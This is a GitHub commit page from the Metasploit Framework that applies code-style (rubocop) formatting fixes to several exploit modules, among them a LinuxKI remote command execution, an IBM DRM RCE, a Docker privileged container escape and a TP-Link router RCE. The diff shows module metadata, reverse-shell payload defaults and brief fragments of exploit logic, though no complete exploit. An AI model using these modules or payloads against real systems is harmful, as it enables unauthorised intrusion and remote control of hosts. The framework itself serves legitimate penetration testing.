Skip to content

Commit

Permalink
Run rubocop on exploit modules
Browse files Browse the repository at this point in the history
  • Loading branch information
@adfoster-r7
adfoster-r7 committed Feb 8, 2023
1 parent 9469c83 commit 25ee41d
Show file tree
Hide file tree
Showing 20 changed files with 282 additions and 297 deletions.
3 changes: 1 addition & 2 deletions modules/exploits/linux/http/axis_app_install.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -48,8 +48,7 @@ def initialize(info = {})
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE],
'Type' => :linux_dropper,
'Payload' => {
},
'Payload' => {},
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' # Use stagless payloads until issue 16107 gets addressed to fix the ARMLE stager
}
Expand Down
6 changes: 3 additions & 3 deletions modules/exploits/linux/http/ibm_drm_rce.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -154,7 +154,7 @@ def free_the_admin(session_id)
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

unless res && (res.code == 200) && res.body[/"data":"([0-9a-f\-]{36})/]
unless res && (res.code == 200) && res.body[/"data":"([0-9a-f-]{36})/]
fail_with(Failure::Unknown, "#{peer} - Failed to obtain the admin password.")
end

Expand Down Expand Up @@ -189,7 +189,7 @@ def login_and_csrf(password)
'cookie' => cookie
})

unless res && (res.code == 200) && res.body =~ /var csrfToken = "([0-9a-f\-]{36})";/
unless res && (res.code == 200) && res.body =~ /var csrfToken = "([0-9a-f-]{36})";/
fail_with(Failure::Unknown, "#{peer} - Failed to authenticate obtain CSRF cookie.")
end
csrf = Regexp.last_match(1)
Expand Down Expand Up @@ -269,7 +269,7 @@ def obtain_bearer_token(password)
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

unless res && (res.code == 200) && res.body =~ /"data":\{"access_token":"([0-9a-f\-]{36})","token_type":"bearer"/
unless res && (res.code == 200) && res.body =~ /"data":\{"access_token":"([0-9a-f-]{36})","token_type":"bearer"/
fail_with(Failure::Unknown, "#{peer} - Failed to obtain Bearer token.")
end

Expand Down
120 changes: 60 additions & 60 deletions modules/exploits/linux/http/linuxki_rce.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,69 +14,69 @@ class MetasploitModule < Msf::Exploit::Remote

def initialize(info = {})
super(
update_info(
info,
'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
},
'License' => MSF_LICENSE,
'Author' => [
'Cody Winkler', # discovery and poc
'numan türle' # msf exploit
update_info(
info,
'Name' => 'LinuxKI Toolset 6.01 Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
},
'License' => MSF_LICENSE,
'Author' => [
'Cody Winkler', # discovery and poc
'numan türle' # msf exploit
],
'References' => [
['EDB', '48483'],
['CVE', '2020-7209'],
['PACKETSTORM', '157739'],
['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
],
'Privileged' => false,
'Platform' => ['php', 'unix', 'linux'],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Automatic (PHP In-Memory)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_memory,
'Payload' => { 'BadChars' => "'" },
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
'References' => [
['EDB', '48483'],
['CVE', '2020-7209'],
['PACKETSTORM', '157739'],
['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
[
'Automatic (PHP Dropper)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
'Privileged' => false,
'Platform' => ['php', 'unix', 'linux'],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Automatic (PHP In-Memory)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_memory,
'Payload' => { 'BadChars' => "'" },
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
[
'Automatic (PHP Dropper)',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
],
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
[
'Automatic (Linux Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
]
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
}
],
'DisclosureDate' => '2020-05-17',
'DefaultTarget' => 0
)
[
'Automatic (Linux Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
]
],
'DisclosureDate' => '2020-05-17',
'DefaultTarget' => 0
)
)

register_options([
Expand Down
2 changes: 1 addition & 1 deletion modules/exploits/linux/http/pandora_fms_events_exec.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -109,7 +109,7 @@ def check

full_version = full_version.text

version = full_version[1..-1].sub('NG', '')
version = full_version[1..].sub('NG', '')

if version.blank?
return CheckCode::Detected('Could not determine the Pandora FMS version.')
Expand Down
48 changes: 24 additions & 24 deletions modules/exploits/linux/local/docker_privileged_container_escape.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,30 +16,30 @@ class MetasploitModule < Msf::Exploit::Local

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Docker Privileged Container Escape',
'Description' => %q{
This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
},
'License' => MSF_LICENSE,
'Author' => ['stealthcopter'],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'References' => [
['EDB', '47147'],
['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
['URL', 'https://github.com/stealthcopter/deepce']
],
'DisclosureDate' => '2019-07-17' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
}
)
update_info(
info,
{
'Name' => 'Docker Privileged Container Escape',
'Description' => %q{
This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
},
'License' => MSF_LICENSE,
'Author' => ['stealthcopter'],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultTarget' => 0,
'References' => [
['EDB', '47147'],
['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
['URL', 'https://github.com/stealthcopter/deepce']
],
'DisclosureDate' => '2019-07-17' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
}
)
)
register_advanced_options(
[
Expand Down
72 changes: 36 additions & 36 deletions modules/exploits/linux/local/su_login.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,43 +16,43 @@ class MetasploitModule < Msf::Exploit::Local

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Login to Another User with Su on Linux / Unix Systems',
'Description' => %q{
This module attempts to create a new login session by
invoking the su command of a valid username and password.
If the login is successful, a new session is created via
the specified payload.
Because su forces passwords to be passed over stdin, this
module attempts to invoke a psuedo-terminal with python,
python3, or script.
},
'License' => MSF_LICENSE,
'Author' => 'Gavin Youker <youkergav@gmail.com>',
'DisclosureDate' => '1971-11-03',
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Linux x86', {
'Arch' => ARCH_X86,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'Linux x86_64', {
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
update_info(
info,
'Name' => 'Login to Another User with Su on Linux / Unix Systems',
'Description' => %q{
This module attempts to create a new login session by
invoking the su command of a valid username and password.
If the login is successful, a new session is created via
the specified payload.
Because su forces passwords to be passed over stdin, this
module attempts to invoke a psuedo-terminal with python,
python3, or script.
},
'License' => MSF_LICENSE,
'Author' => 'Gavin Youker <youkergav@gmail.com>',
'DisclosureDate' => '1971-11-03',
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Linux x86', {
'Arch' => ARCH_X86,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'SessionTypes' => ['shell', 'meterpreter']
)
[
'Linux x86_64', {
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'SessionTypes' => ['shell', 'meterpreter']
)
)

register_options([
Expand Down
2 changes: 1 addition & 1 deletion modules/exploits/linux/local/sudo_baron_samedit.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -186,7 +186,7 @@ def do_post_exploit_checks
if resolved_indices.length > 1
print_status('')
print_status('Alternative exploit target(s) exist for this OS version:')
resolved_indices[1..-1].each { |index| print_status("#{index}: #{targets[index].name}") }
resolved_indices[1..].each { |index| print_status("#{index}: #{targets[index].name}") }
print_status('Run `set target <id>` to select an alternative exploit script')
end
end
Expand Down
2 changes: 1 addition & 1 deletion modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -298,7 +298,7 @@ def create_injection(c, literal: false)
def update_len_field(packet, payload_length)
new_packet = packet[0..3]
new_packet += [payload_length].pack('S>')
new_packet += packet[6..-1]
new_packet += packet[6..]
new_packet
end

Expand Down
3 changes: 1 addition & 2 deletions modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -56,8 +56,7 @@ def initialize(info = {})
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
},
'Payload' => {},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
Expand Down

0 comments on commit 25ee41d

Please sign in to comment.